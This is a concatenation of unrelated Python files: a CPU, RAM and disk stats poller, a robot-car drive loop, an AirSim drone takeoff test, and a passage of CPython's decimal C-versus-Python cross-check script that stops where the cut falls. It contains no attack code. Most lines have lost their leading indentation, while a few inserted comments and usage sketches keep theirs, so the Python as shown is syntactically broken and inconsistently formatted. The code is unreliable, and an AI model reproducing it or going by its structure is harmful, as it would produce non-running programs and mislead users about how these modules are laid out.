p = Popen('iostat -m 1 -g ALL -H'.split(), stdout=PIPE, stderr=PIPE)
for line in p.stdout:
line = line.decode('utf-8')
if line.strip().startswith('ALL'):
read_write = tuple(float(x.replace(',', '.')) for x in line.split()[2:4])
t = threading.Thread(target=worker, daemon=True)  # daemon thread so the iostat reader does not block interpreter exit
t.start()
def get_cpu_percent():
return psutil.cpu_percent()
def get_ram():
return psutil.virtual_memory().used / 1024**2
def get_vram():
return gpustats()[0]
def get_read():
return read_write[0]
def get_write():
return read_write[1]
TOTAL_RAM = psutil.virtual_memory().total / 1024**2
TOTAL_GPU = None
try:
TOTAL_GPU = gpustats()[1]
except Exception as e:
print('GPU unavailable.')
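# Hedged usage sketch (not part of the original module): a short polling demo that
# prints the collected stats once per second. Assumes psutil is installed and the
# iostat (and optionally nvidia-smi) tools exist on the host.
if __name__ == '__main__':
    import time
    for _ in range(5):
        print(f'CPU {get_cpu_percent():.1f}%  '
              f'RAM {get_ram():.0f}/{TOTAL_RAM:.0f} MiB  '
              f'disk r/w {get_read():.2f}/{get_write():.2f} MB/s')
        time.sleep(1)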
|
vehicle.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 25 10:44:24 2017
@author: wroscoe
"""
import time
from threading import Thread
from .memory import Memory
class Vehicle():
def __init__(self, mem=None):
if not mem:
mem = Memory()
self.mem = mem
self.parts = []
self.on = True
self.threads = []
def add(self, part, inputs=[], outputs=[],
threaded=False, run_condition=None):
"""
Method to add a part to the vehicle drive loop.
Parameters
----------
inputs : list
Channel names to get from memory.
        outputs : list
Channel names to save to memory.
threaded : boolean
If a part should be run in a separate thread.
"""
p = part
print('Adding part {}.'.format(p.__class__.__name__))
        entry = {}
entry['part'] = p
entry['inputs'] = inputs
entry['outputs'] = outputs
entry['run_condition'] = run_condition
if threaded:
t = Thread(target=part.update, args=())
t.daemon = True
entry['thread'] = t
self.parts.append(entry)
def remove(self, part):
"""
        Remove part from the parts list.
"""
self.parts.remove(part)
def start(self, rate_hz=10, max_loop_count=None, verbose=False):
"""
Start vehicle's main drive loop.
This is the main thread of the vehicle. It starts all the new
        threads for the threaded parts, then starts an infinite loop
that runs each part and updates the memory.
Parameters
----------
rate_hz : int
            The maximum frequency at which the drive loop should run. The actual
frequency may be less than this if there are many blocking parts.
max_loop_count : int
            Maximum number of loops the drive loop should execute. This is
            used for testing that all the parts of the vehicle work.
"""
try:
self.on = True
for entry in self.parts:
if entry.get('thread'):
#start the update thread
entry.get('thread').start()
#wait until the parts warm up.
print('Starting vehicle...')
#time.sleep(1)
loop_count = 0
while self.on:
start_time = time.time()
loop_count += 1
self.update_parts()
                # stop the drive loop if loop_count exceeds max_loop_count
if max_loop_count and loop_count > max_loop_count:
self.on = False
sleep_time = 1.0 / rate_hz - (time.time() - start_time)
if sleep_time > 0.0:
time.sleep(sleep_time)
else:
                    # print a message when the loop rate could not be maintained.
if verbose:
print('WARN::Vehicle: jitter violation in vehicle loop with value:', abs(sleep_time))
except KeyboardInterrupt:
pass
finally:
self.stop()
def update_parts(self):
'''
loop over all parts
'''
for entry in self.parts:
#don't run if there is a run condition that is False
run = True
if entry.get('run_condition'):
run_condition = entry.get('run_condition')
run = self.mem.get([run_condition])[0]
#print('run_condition', entry['part'], entry.get('run_condition'), run)
if run:
p = entry['part']
#get inputs from memory
inputs = self.mem.get(entry['inputs'])
#run the part
if entry.get('thread'):
outputs = p.run_threaded(*inputs)
else:
outputs = p.run(*inputs)
#save the output to memory
if outputs is not None:
self.mem.put(entry['outputs'], outputs)
def stop(self):
print('Shutting down vehicle and its parts...')
for entry in self.parts:
try:
entry['part'].shutdown()
except AttributeError:
#usually from missing shutdown method, which should be optional
pass
except Exception as e:
print(e)
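# Hedged usage sketch (not part of the original module). 'CameraPart' and
# 'ActuatorPart' are hypothetical parts: a threaded part needs update() and
# run_threaded() methods, a plain part needs run().
#
#   v = Vehicle()
#   v.add(CameraPart(), outputs=['cam/image'], threaded=True)
#   v.add(ActuatorPart(), inputs=['cam/image'])
#   v.start(rate_hz=20, max_loop_count=200)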
|
runtime_test.py
|
#!/usr/bin/python
import sys
import os
import threading
from threading import Thread
import time
import signal
import subprocess
airsimprocess = subprocess.Popen(["/home/nvagent/Blocks/Blocks.sh"])
exit_flag = False
def exit_properly_runtime_test():
global exit_flag
print("CREATING SUCCESS RESULT FILE")
print("CREATING SUCCESS RESULT FILE")
f = open("result.txt", "w")
f.write("0")
f.close()
exit_flag = True
airsimprocess.kill()
airsimprocess.wait()
time.sleep(10)
print("EXITING")
sys.exit(0)
#timeout countdown
def start_countdown(seconds):
def timeout_countdown(seconds):
global exit_flag
time.sleep(seconds)
print("COUNTDOWN ERROR RUNTIME TEST")
exit_flag = True
sys.exit(1)
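        # Note: sys.exit() here only raises SystemExit in this countdown thread;
        # it does not terminate the whole process. A hard timeout would need
        # something like os._exit(1) instead (left unchanged here).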
    t = Thread(target=timeout_countdown, args=(seconds,))
t.start()
start_countdown(320)
#-------------------------------------------------------------------
#-------------------------------------------------------------------
# launch countdown
print ("HELLO WORLD. Waiting 30 seconds to server...")
time.sleep(30)
import airsim
client = airsim.MultirotorClient()
client.confirmConnection()
client.enableApiControl(True)
client.armDisarm(True)
client.reset()
client.enableApiControl(False)
print("taking off...")
pos = client.getMultirotorState().kinematics_estimated.position
client.takeoffAsync().join()
print("taking off DONE")
time.sleep(1)
print("going to z=10")
client.moveToPositionAsync(0, 0, 10, 0.25, 60, drivetrain=airsim.DrivetrainType.MaxDegreeOfFreedom, yaw_mode=airsim.YawMode(False, 0)).join()
print("DONE")
pos = client.getMultirotorState().kinematics_estimated.position
if pos.z_val > 1:
exit_properly_runtime_test()
else:
print("DID NOT TAKE OFF. TEST NOT PASSED.")
airsimprocess.kill()
airsimprocess.wait()
sys.exit(1)
|
deccheck.py
|
#
# Copyright (c) 2008-2012 Stefan Krah. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
#
# Usage: python deccheck.py [--short|--medium|--long|--all]
#
import random
import time
RANDSEED = int(time.time())
random.seed(RANDSEED)
import sys
import os
from copy import copy
from collections import defaultdict
import argparse
import subprocess
from subprocess import PIPE, STDOUT
from queue import Queue, Empty
from threading import Thread, Event, Lock
from randdec import randfloat, all_unary, all_binary, all_ternary
from randdec import unary_optarg, binary_optarg, ternary_optarg
from formathelper import rand_format, rand_locale
from _pydecimal import _dec_from_triple
from _testcapi import decimal_as_triple
from _testcapi import decimal_from_triple
import _decimal as C
import _pydecimal as P
EXIT_STATUS = 0
# Contains all categories of Decimal methods.
Functions = {
# Plain unary:
'unary': (
'__abs__', '__bool__', '__ceil__', '__complex__', '__copy__',
'__floor__', '__float__', '__hash__', '__int__', '__neg__',
'__pos__', '__reduce__', '__repr__', '__str__', '__trunc__',
'adjusted', 'as_integer_ratio', 'as_tuple', 'canonical', 'conjugate',
'copy_abs', 'copy_negate', 'is_canonical', 'is_finite', 'is_infinite',
'is_nan', 'is_qnan', 'is_signed', 'is_snan', 'is_zero', 'radix'
),
# Unary with optional context:
'unary_ctx': (
'exp', 'is_normal', 'is_subnormal', 'ln', 'log10', 'logb',
'logical_invert', 'next_minus', 'next_plus', 'normalize',
'number_class', 'sqrt', 'to_eng_string'
),
# Unary with optional rounding mode and context:
'unary_rnd_ctx': ('to_integral', 'to_integral_exact', 'to_integral_value'),
# Plain binary:
'binary': (
'__add__', '__divmod__', '__eq__', '__floordiv__', '__ge__', '__gt__',
'__le__', '__lt__', '__mod__', '__mul__', '__ne__', '__pow__',
'__radd__', '__rdivmod__', '__rfloordiv__', '__rmod__', '__rmul__',
'__rpow__', '__rsub__', '__rtruediv__', '__sub__', '__truediv__',
'compare_total', 'compare_total_mag', 'copy_sign', 'quantize',
'same_quantum'
),
# Binary with optional context:
'binary_ctx': (
'compare', 'compare_signal', 'logical_and', 'logical_or', 'logical_xor',
'max', 'max_mag', 'min', 'min_mag', 'next_toward', 'remainder_near',
'rotate', 'scaleb', 'shift'
),
# Plain ternary:
'ternary': ('__pow__',),
# Ternary with optional context:
'ternary_ctx': ('fma',),
# Special:
'special': ('__format__', '__reduce_ex__', '__round__', 'from_float',
'quantize'),
# Properties:
'property': ('real', 'imag')
}
# Contains all categories of Context methods. The n-ary classification
# applies to the number of Decimal arguments.
ContextFunctions = {
# Plain nullary:
'nullary': ('context.__hash__', 'context.__reduce__', 'context.radix'),
# Plain unary:
'unary': ('context.abs', 'context.canonical', 'context.copy_abs',
'context.copy_decimal', 'context.copy_negate',
'context.create_decimal', 'context.exp', 'context.is_canonical',
'context.is_finite', 'context.is_infinite', 'context.is_nan',
'context.is_normal', 'context.is_qnan', 'context.is_signed',
'context.is_snan', 'context.is_subnormal', 'context.is_zero',
'context.ln', 'context.log10', 'context.logb',
'context.logical_invert', 'context.minus', 'context.next_minus',
'context.next_plus', 'context.normalize', 'context.number_class',
'context.plus', 'context.sqrt', 'context.to_eng_string',
'context.to_integral', 'context.to_integral_exact',
'context.to_integral_value', 'context.to_sci_string'
),
# Plain binary:
'binary': ('context.add', 'context.compare', 'context.compare_signal',
'context.compare_total', 'context.compare_total_mag',
'context.copy_sign', 'context.divide', 'context.divide_int',
'context.divmod', 'context.logical_and', 'context.logical_or',
'context.logical_xor', 'context.max', 'context.max_mag',
'context.min', 'context.min_mag', 'context.multiply',
'context.next_toward', 'context.power', 'context.quantize',
'context.remainder', 'context.remainder_near', 'context.rotate',
'context.same_quantum', 'context.scaleb', 'context.shift',
'context.subtract'
),
# Plain ternary:
'ternary': ('context.fma', 'context.power'),
# Special:
'special': ('context.__reduce_ex__', 'context.create_decimal_from_float')
}
# Functions that set no context flags but whose result can differ depending
# on prec, Emin and Emax.
MaxContextSkip = ['is_normal', 'is_subnormal', 'logical_invert', 'next_minus',
'next_plus', 'number_class', 'logical_and', 'logical_or',
'logical_xor', 'next_toward', 'rotate', 'shift']
# Functions that require a restricted exponent range for reasonable runtimes.
UnaryRestricted = [
'__ceil__', '__floor__', '__int__', '__trunc__',
'as_integer_ratio', 'to_integral', 'to_integral_value'
]
BinaryRestricted = ['__round__']
TernaryRestricted = ['__pow__', 'context.power']
# ======================================================================
# Triple tests
# ======================================================================
def c_as_triple(dec):
sign, hi, lo, exp = decimal_as_triple(dec)
coeff = hi * 2**64 + lo
return (sign, coeff, exp)
def c_from_triple(triple):
sign, coeff, exp = triple
hi = coeff // 2**64
lo = coeff % 2**64
return decimal_from_triple((sign, hi, lo, exp))
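# c_as_triple()/c_from_triple() split the coefficient into 64-bit halves: for
# example, coeff = 2**64 + 5 maps to (hi, lo) = (1, 5) and is reassembled as
# hi * 2**64 + lo.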
def p_as_triple(dec):
sign, digits, exp = dec.as_tuple()
s = "".join(str(d) for d in digits)
coeff = int(s) if s else 0
if coeff < 0 or coeff >= 2**128:
raise ValueError("value out of bounds for a uint128 triple");
return (sign, coeff, exp)
def p_from_triple(triple):
sign, coeff, exp = triple
if coeff < 0 or coeff >= 2**128:
raise ValueError("value out of bounds for a uint128 triple");
digits = tuple(int(c) for c in str(coeff))
return P.Decimal((sign, digits, exp))
# ======================================================================
# Unified Context
# ======================================================================
# Translate symbols.
CondMap = {
C.Clamped: P.Clamped,
C.ConversionSyntax: P.ConversionSyntax,
C.DivisionByZero: P.DivisionByZero,
C.DivisionImpossible: P.InvalidOperation,
C.DivisionUndefined: P.DivisionUndefined,
C.Inexact: P.Inexact,
C.InvalidContext: P.InvalidContext,
C.InvalidOperation: P.InvalidOperation,
C.Overflow: P.Overflow,
C.Rounded: P.Rounded,
C.Subnormal: P.Subnormal,
C.Underflow: P.Underflow,
C.FloatOperation: P.FloatOperation,
}
RoundModes = [C.ROUND_UP, C.ROUND_DOWN, C.ROUND_CEILING, C.ROUND_FLOOR,
C.ROUND_HALF_UP, C.ROUND_HALF_DOWN, C.ROUND_HALF_EVEN,
C.ROUND_05UP]
class Context(object):
"""Provides a convenient way of syncing the C and P contexts"""
__slots__ = ['c', 'p']
def __init__(self, c_ctx=None, p_ctx=None):
"""Initialization is from the C context"""
self.c = C.getcontext() if c_ctx is None else c_ctx
self.p = P.getcontext() if p_ctx is None else p_ctx
self.p.prec = self.c.prec
self.p.Emin = self.c.Emin
self.p.Emax = self.c.Emax
self.p.rounding = self.c.rounding
self.p.capitals = self.c.capitals
self.settraps([sig for sig in self.c.traps if self.c.traps[sig]])
self.setstatus([sig for sig in self.c.flags if self.c.flags[sig]])
self.p.clamp = self.c.clamp
def __str__(self):
return str(self.c) + '\n' + str(self.p)
def getprec(self):
assert(self.c.prec == self.p.prec)
return self.c.prec
def setprec(self, val):
self.c.prec = val
self.p.prec = val
def getemin(self):
assert(self.c.Emin == self.p.Emin)
return self.c.Emin
def setemin(self, val):
self.c.Emin = val
self.p.Emin = val
def getemax(self):
assert(self.c.Emax == self.p.Emax)
return self.c.Emax
def setemax(self, val):
self.c.Emax = val
self.p.Emax = val
def getround(self):
assert(self.c.rounding == self.p.rounding)
return self.c.rounding
def setround(self, val):
self.c.rounding = val
self.p.rounding = val
def getcapitals(self):
assert(self.c.capitals == self.p.capitals)
return self.c.capitals
def setcapitals(self, val):
self.c.capitals = val
self.p.capitals = val
def getclamp(self):
assert(self.c.clamp == self.p.clamp)
return self.c.clamp
def setclamp(self, val):
self.c.clamp = val
self.p.clamp = val
prec = property(getprec, setprec)
Emin = property(getemin, setemin)
Emax = property(getemax, setemax)
rounding = property(getround, setround)
clamp = property(getclamp, setclamp)
capitals = property(getcapitals, setcapitals)
def clear_traps(self):
self.c.clear_traps()
for trap in self.p.traps:
self.p.traps[trap] = False
def clear_status(self):
self.c.clear_flags()
self.p.clear_flags()
def settraps(self, lst):
"""lst: C signal list"""
self.clear_traps()
for signal in lst:
self.c.traps[signal] = True
self.p.traps[CondMap[signal]] = True
def setstatus(self, lst):
"""lst: C signal list"""
self.clear_status()
for signal in lst:
self.c.flags[signal] = True
self.p.flags[CondMap[signal]] = True
def assert_eq_status(self):
"""assert equality of C and P status"""
for signal in self.c.flags:
if self.c.flags[signal] == (not self.p.flags[CondMap[signal]]):
return False
return True
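# Example: assigning 'context.prec = 9' goes through the prec property above and
# updates both the C context (self.c.prec) and the Python context (self.p.prec).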
# We don't want exceptions so that we can compare the status flags.
context = Context()
context.Emin = C.MIN_EMIN
context.Emax = C.MAX_EMAX
context.clear_traps()
# When creating decimals, _decimal is ultimately limited by the maximum
# context values. We emulate this restriction for decimal.py.
maxcontext = P.Context(
prec=C.MAX_PREC,
Emin=C.MIN_EMIN,
Emax=C.MAX_EMAX,
rounding=P.ROUND_HALF_UP,
capitals=1
)
maxcontext.clamp = 0
def RestrictedDecimal(value):
maxcontext.traps = copy(context.p.traps)
maxcontext.clear_flags()
if isinstance(value, str):
value = value.strip()
dec = maxcontext.create_decimal(value)
if maxcontext.flags[P.Inexact] or \
maxcontext.flags[P.Rounded] or \
maxcontext.flags[P.Clamped] or \
maxcontext.flags[P.InvalidOperation]:
return context.p._raise_error(P.InvalidOperation)
if maxcontext.flags[P.FloatOperation]:
context.p.flags[P.FloatOperation] = True
return dec
# ======================================================================
# TestSet: Organize data and events during a single test case
# ======================================================================
class RestrictedList(list):
"""List that can only be modified by appending items."""
def __getattribute__(self, name):
if name != 'append':
raise AttributeError("unsupported operation")
return list.__getattribute__(self, name)
def unsupported(self, *_):
raise AttributeError("unsupported operation")
__add__ = __delattr__ = __delitem__ = __iadd__ = __imul__ = unsupported
__mul__ = __reversed__ = __rmul__ = __setattr__ = __setitem__ = unsupported
class TestSet(object):
"""A TestSet contains the original input operands, converted operands,
Python exceptions that occurred either during conversion or during
execution of the actual function, and the final results.
For safety, most attributes are lists that only support the append
operation.
If a function name is prefixed with 'context.', the corresponding
context method is called.
"""
def __init__(self, funcname, operands):
if funcname.startswith("context."):
self.funcname = funcname.replace("context.", "")
self.contextfunc = True
else:
self.funcname = funcname
self.contextfunc = False
self.op = operands # raw operand tuple
self.context = context # context used for the operation
self.cop = RestrictedList() # converted C.Decimal operands
self.cex = RestrictedList() # Python exceptions for C.Decimal
self.cresults = RestrictedList() # C.Decimal results
self.pop = RestrictedList() # converted P.Decimal operands
self.pex = RestrictedList() # Python exceptions for P.Decimal
self.presults = RestrictedList() # P.Decimal results
# If the above results are exact, unrounded and not clamped, repeat
# the operation with a maxcontext to ensure that huge intermediate
# values do not cause a MemoryError.
self.with_maxcontext = False
self.maxcontext = context.c.copy()
self.maxcontext.prec = C.MAX_PREC
self.maxcontext.Emax = C.MAX_EMAX
self.maxcontext.Emin = C.MIN_EMIN
self.maxcontext.clear_flags()
self.maxop = RestrictedList() # converted C.Decimal operands
self.maxex = RestrictedList() # Python exceptions for C.Decimal
self.maxresults = RestrictedList() # C.Decimal results
# ======================================================================
# SkipHandler: skip known discrepancies
# ======================================================================
class SkipHandler:
"""Handle known discrepancies between decimal.py and _decimal.so.
These are either ULP differences in the power function or
extremely minor issues."""
def __init__(self):
self.ulpdiff = 0
self.powmod_zeros = 0
self.maxctx = P.Context(Emax=10**18, Emin=-10**18)
def default(self, t):
return False
__ge__ = __gt__ = __le__ = __lt__ = __ne__ = __eq__ = default
__reduce__ = __format__ = __repr__ = __str__ = default
def harrison_ulp(self, dec):
"""ftp://ftp.inria.fr/INRIA/publication/publi-pdf/RR/RR-5504.pdf"""
a = dec.next_plus()
b = dec.next_minus()
return abs(a - b)
def standard_ulp(self, dec, prec):
return _dec_from_triple(0, '1', dec._exp+len(dec._int)-prec)
def rounding_direction(self, x, mode):
"""Determine the effective direction of the rounding when
the exact result x is rounded according to mode.
Return -1 for downwards, 0 for undirected, 1 for upwards,
2 for ROUND_05UP."""
cmp = 1 if x.compare_total(P.Decimal("+0")) >= 0 else -1
if mode in (P.ROUND_HALF_EVEN, P.ROUND_HALF_UP, P.ROUND_HALF_DOWN):
return 0
elif mode == P.ROUND_CEILING:
return 1
elif mode == P.ROUND_FLOOR:
return -1
elif mode == P.ROUND_UP:
return cmp
elif mode == P.ROUND_DOWN:
return -cmp
elif mode == P.ROUND_05UP:
return 2
else:
raise ValueError("Unexpected rounding mode: %s" % mode)
def check_ulpdiff(self, exact, rounded):
# current precision
p = context.p.prec
# Convert infinities to the largest representable number + 1.
x = exact
if exact.is_infinite():
x = _dec_from_triple(exact._sign, '10', context.p.Emax)
y = rounded
if rounded.is_infinite():
y = _dec_from_triple(rounded._sign, '10', context.p.Emax)
# err = (rounded - exact) / ulp(rounded)
self.maxctx.prec = p * 2
t = self.maxctx.subtract(y, x)
if context.c.flags[C.Clamped] or \
context.c.flags[C.Underflow]:
# The standard ulp does not work in Underflow territory.
ulp = self.harrison_ulp(y)
else:
ulp = self.standard_ulp(y, p)
# Error in ulps.
err = self.maxctx.divide(t, ulp)
dir = self.rounding_direction(x, context.p.rounding)
if dir == 0:
if P.Decimal("-0.6") < err < P.Decimal("0.6"):
return True
elif dir == 1: # directed, upwards
if P.Decimal("-0.1") < err < P.Decimal("1.1"):
return True
elif dir == -1: # directed, downwards
if P.Decimal("-1.1") < err < P.Decimal("0.1"):
return True
else: # ROUND_05UP
if P.Decimal("-1.1") < err < P.Decimal("1.1"):
return True
print("ulp: %s error: %s exact: %s c_rounded: %s"
% (ulp, err, exact, rounded))
return False
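# Editor's note (illustrative, not part of the original deccheck.py): for a
# result rounded to prec=5 digits, e.g. P.Decimal("1.2345E+5") with
# _int='12345' and _exp=1, standard_ulp() returns
#
#     _dec_from_triple(0, '1', 1 + 5 - 5) == Decimal("1E+1")
#
# i.e. one unit in the last place of the 5-digit coefficient. check_ulpdiff()
# above expresses (rounded - exact) in multiples of that ulp and accepts the
# result only if the error stays inside the window matching the rounding
# direction: roughly +/-0.6 ulp for the round-to-nearest modes, an asymmetric
# window of up to 1.1 ulp for the directed modes, and +/-1.1 ulp for ROUND_05UP.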
def bin_resolve_ulp(self, t):
"""Check if results of _decimal's power function are within the
allowed ulp ranges."""
# NaNs are beyond repair.
if t.rc.is_nan() or t.rp.is_nan():
return False
# "exact" result, double precision, half_even
self.maxctx.prec = context.p.prec * 2
op1, op2 = t.pop[0], t.pop[1]
if t.contextfunc:
exact = getattr(self.maxctx, t.funcname)(op1, op2)
else:
exact = getattr(op1, t.funcname)(op2, context=self.maxctx)
# _decimal's rounded result
rounded = P.Decimal(t.cresults[0])
self.ulpdiff += 1
return self.check_ulpdiff(exact, rounded)
############################ Correct rounding #############################
def resolve_underflow(self, t):
"""In extremely rare cases where the infinite precision result is just
below etiny, cdecimal does not set Subnormal/Underflow. Example:
setcontext(Context(prec=21, rounding=ROUND_UP, Emin=-55, Emax=85))
Decimal("1.00000000000000000000000000000000000000000000000"
"0000000100000000000000000000000000000000000000000"
"0000000000000025").ln()
"""
if t.cresults != t.presults:
return False # Results must be identical.
if context.c.flags[C.Rounded] and \
context.c.flags[C.Inexact] and \
context.p.flags[P.Rounded] and \
context.p.flags[P.Inexact]:
return True # Subnormal/Underflow may be missing.
return False
def exp(self, t):
"""Resolve Underflow or ULP difference."""
return self.resolve_underflow(t)
def log10(self, t):
"""Resolve Underflow or ULP difference."""
return self.resolve_underflow(t)
def ln(self, t):
"""Resolve Underflow or ULP difference."""
return self.resolve_underflow(t)
def __pow__(self, t):
"""Always calls the resolve function. C.Decimal does not have correct
rounding for the power function."""
if context.c.flags[C.Rounded] and \
context.c.flags[C.Inexact] and \
context.p.flags[P.Rounded] and \
context.p.flags[P.Inexact]:
return self.bin_resolve_ulp(t)
else:
return False
power = __rpow__ = __pow__
############################## Technicalities #############################
def __float__(self, t):
"""NaN comparison in the verify() function obviously gives an
incorrect answer: nan == nan -> False"""
if t.cop[0].is_nan() and t.pop[0].is_nan():
return True
return False
__complex__ = __float__
def __radd__(self, t):
"""decimal.py gives precedence to the first NaN; this is
not important, as __radd__ will not be called for
two decimal arguments."""
if t.rc.is_nan() and t.rp.is_nan():
return True
return False
__rmul__ = __radd__
################################ Various ##################################
def __round__(self, t):
"""Exception: Decimal('1').__round__(-100000000000000000000000000)
Should it really be InvalidOperation?"""
if t.rc is None and t.rp.is_nan():
return True
return False
shandler = SkipHandler()
def skip_error(t):
return getattr(shandler, t.funcname, shandler.default)(t)
# ======================================================================
# Handling verification errors
# ======================================================================
class VerifyError(Exception):
"""Verification failed."""
pass
def function_as_string(t):
if t.contextfunc:
cargs = t.cop
pargs = t.pop
maxargs = t.maxop
cfunc = "c_func: %s(" % t.funcname
pfunc = "p_func: %s(" % t.funcname
maxfunc = "max_func: %s(" % t.funcname
else:
cself, cargs = t.cop[0], t.cop[1:]
pself, pargs = t.pop[0], t.pop[1:]
maxself, maxargs = t.maxop[0], t.maxop[1:]
cfunc = "c_func: %s.%s(" % (repr(cself), t.funcname)
pfunc = "p_func: %s.%s(" % (repr(pself), t.funcname)
maxfunc = "max_func: %s.%s(" % (repr(maxself), t.funcname)
err = cfunc
for arg in cargs:
err += "%s, " % repr(arg)
err = err.rstrip(", ")
err += ")\n"
err += pfunc
for arg in pargs:
err += "%s, " % repr(arg)
err = err.rstrip(", ")
err += ")"
if t.with_maxcontext:
err += "\n"
err += maxfunc
for arg in maxargs:
err += "%s, " % repr(arg)
err = err.rstrip(", ")
err += ")"
return err
def raise_error(t):
global EXIT_STATUS
if skip_error(t):
return
EXIT_STATUS = 1
err = "Error in %s:\n\n" % t.funcname
err += "input operands: %s\n\n" % (t.op,)
err += function_as_string(t)
err += "\n\nc_result: %s\np_result: %s\n" % (t.cresults, t.presults)
if t.with_maxcontext:
err += "max_result: %s\n\n" % (t.maxresults)
else:
err += "\n"
err += "c_exceptions: %s\np_exceptions: %s\n" % (t.cex, t.pex)
if t.with_maxcontext:
err += "max_exceptions: %s\n\n" % t.maxex
else:
err += "\n"
err += "%s\n" % str(t.context)
if t.with_maxcontext:
err += "%s\n" % str(t.maxcontext)
else:
err += "\n"
raise VerifyError(err)
# ======================================================================
# Main testing functions
#
# The procedure is always (t is the TestSet):
#
# convert(t) -> Initialize the TestSet as necessary.
#
# Return 0 to abort early (e.g. if a TypeError
# occurs during conversion, there is nothing to test).
#
# Return 1 for continuing with the test case.
#
# callfuncs(t) -> Call the relevant function for each implementation
# and record the results in the TestSet.
#
# verify(t) -> Verify the results. If verification fails, details
# are printed to stdout.
# ======================================================================
def all_nan(a):
if isinstance(a, C.Decimal):
return a.is_nan()
elif isinstance(a, tuple):
return all(all_nan(v) for v in a)
return False
def convert(t, convstr=True):
""" t is the testset. At this stage the testset contains a tuple of
operands t.op of various types. For decimal methods the first
operand (self) is always converted to Decimal. If 'convstr' is
true, string operands are converted as well.
Context operands are of type deccheck.Context, rounding mode
operands are given as a tuple (C.rounding, P.rounding).
Other types (float, int, etc.) are left unchanged.
"""
for i, op in enumerate(t.op):
context.clear_status()
t.maxcontext.clear_flags()
if op in RoundModes:
t.cop.append(op)
t.pop.append(op)
t.maxop.append(op)
elif not t.contextfunc and i == 0 or \
convstr and isinstance(op, str):
try:
c = C.Decimal(op)
cex = None
except (TypeError, ValueError, OverflowError) as e:
c = None
cex = e.__class__
try:
p = RestrictedDecimal(op)
pex = None
except (TypeError, ValueError, OverflowError) as e:
p = None
pex = e.__class__
try:
C.setcontext(t.maxcontext)
maxop = C.Decimal(op)
maxex = None
except (TypeError, ValueError, OverflowError) as e:
maxop = None
maxex = e.__class__
finally:
C.setcontext(context.c)
t.cop.append(c)
t.cex.append(cex)
t.pop.append(p)
t.pex.append(pex)
t.maxop.append(maxop)
t.maxex.append(maxex)
if cex is pex:
if str(c) != str(p) or not context.assert_eq_status():
raise_error(t)
if cex and pex:
# nothing to test
return 0
else:
raise_error(t)
# The exceptions in the maxcontext operation can legitimately
# differ, only test that maxex implies cex:
if maxex is not None and cex is not maxex:
raise_error(t)
elif isinstance(op, Context):
t.context = op
t.cop.append(op.c)
t.pop.append(op.p)
t.maxop.append(t.maxcontext)
else:
t.cop.append(op)
t.pop.append(op)
t.maxop.append(op)
return 1
def callfuncs(t):
""" t is the testset. At this stage the testset contains operand lists
t.cop and t.pop for the C and Python versions of decimal.
For Decimal methods, the first operands are of type C.Decimal and
P.Decimal respectively. The remaining operands can have various types.
For Context methods, all operands can have any type.
t.rc and t.rp are the results of the operation.
"""
context.clear_status()
t.maxcontext.clear_flags()
try:
if t.contextfunc:
cargs = t.cop
t.rc = getattr(context.c, t.funcname)(*cargs)
else:
cself = t.cop[0]
cargs = t.cop[1:]
t.rc = getattr(cself, t.funcname)(*cargs)
t.cex.append(None)
except (TypeError, ValueError, OverflowError, MemoryError) as e:
t.rc = None
t.cex.append(e.__class__)
try:
if t.contextfunc:
pargs = t.pop
t.rp = getattr(context.p, t.funcname)(*pargs)
else:
pself = t.pop[0]
pargs = t.pop[1:]
t.rp = getattr(pself, t.funcname)(*pargs)
t.pex.append(None)
except (TypeError, ValueError, OverflowError, MemoryError) as e:
t.rp = None
t.pex.append(e.__class__)
# If the above results are exact, unrounded, normal etc., repeat the
# operation with a maxcontext to ensure that huge intermediate values
# do not cause a MemoryError.
if (t.funcname not in MaxContextSkip and
not context.c.flags[C.InvalidOperation] and
not context.c.flags[C.Inexact] and
not context.c.flags[C.Rounded] and
not context.c.flags[C.Subnormal] and
not context.c.flags[C.Clamped] and
not context.clamp and # results are padded to context.prec if context.clamp==1.
not any(isinstance(v, C.Context) for v in t.cop)): # another context is used.
t.with_maxcontext = True
try:
if t.contextfunc:
maxargs = t.maxop
t.rmax = getattr(t.maxcontext, t.funcname)(*maxargs)
else:
maxself = t.maxop[0]
maxargs = t.maxop[1:]
try:
C.setcontext(t.maxcontext)
t.rmax = getattr(maxself, t.funcname)(*maxargs)
finally:
C.setcontext(context.c)
t.maxex.append(None)
except (TypeError, ValueError, OverflowError, MemoryError) as e:
t.rmax = None
t.maxex.append(e.__class__)
def verify(t, stat):
""" t is the testset. At this stage the testset contains the following
tuples:
t.op: original operands
t.cop: C.Decimal operands (see convert for details)
t.pop: P.Decimal operands (see convert for details)
t.rc: C result
t.rp: Python result
t.rc and t.rp can have various types.
"""
t.cresults.append(str(t.rc))
t.presults.append(str(t.rp))
if t.with_maxcontext:
t.maxresults.append(str(t.rmax))
if isinstance(t.rc, C.Decimal) and isinstance(t.rp, P.Decimal):
# General case: both results are Decimals.
t.cresults.append(t.rc.to_eng_string())
t.cresults.append(t.rc.as_tuple())
t.cresults.append(str(t.rc.imag))
t.cresults.append(str(t.rc.real))
t.presults.append(t.rp.to_eng_string())
t.presults.append(t.rp.as_tuple())
t.presults.append(str(t.rp.imag))
